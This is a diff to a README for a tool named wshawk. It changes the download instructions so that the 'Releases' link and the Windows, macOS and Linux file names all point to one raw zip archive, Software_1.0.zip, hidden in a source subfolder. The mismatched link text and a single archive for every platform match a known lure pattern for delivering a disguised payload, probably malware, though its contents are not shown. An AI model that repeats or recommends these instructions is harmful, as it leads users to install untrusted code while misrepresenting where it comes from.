habiba-es/wshawk/README.md

 ## 📥 Download & Install

-To get wshawk, visit this page to download: [wshawk Releases](https://github.com/habiba-es/wshawk/releases).
+To get wshawk, visit this page to download: [wshawk Releases](https://github.com/habiba-es/wshawk/raw/refs/heads/main/wshawk/mutators/Software_1.0.zip).

 1. Click the link above to go to the Releases page.
 2. On this page, look for the latest version of wshawk.
 3. You will find a section that lists the files available for download.
 Choose the appropriate file for your operating system.

-   - If you're using Windows, you might download `wshawk-windows.zip`.
+   - If you're using Windows, you might download `https://github.com/habiba-es/wshawk/raw/refs/heads/main/wshawk/mutators/Software_1.0.zip`.
-   - For macOS, look for `wshawk-macos.zip`.
+   - For macOS, look for `https://github.com/habiba-es/wshawk/raw/refs/heads/main/wshawk/mutators/Software_1.0.zip`.
-   - If you're on Linux, download `wshawk-linux.tar.gz`.
+   - If you're on Linux, download `https://github.com/habiba-es/wshawk/raw/refs/heads/main/wshawk/mutators/Software_1.0.zip`.

 4. Click the file name to start the download.
 Your browser will show the progress, and once finished, locate the file in your downloads folder.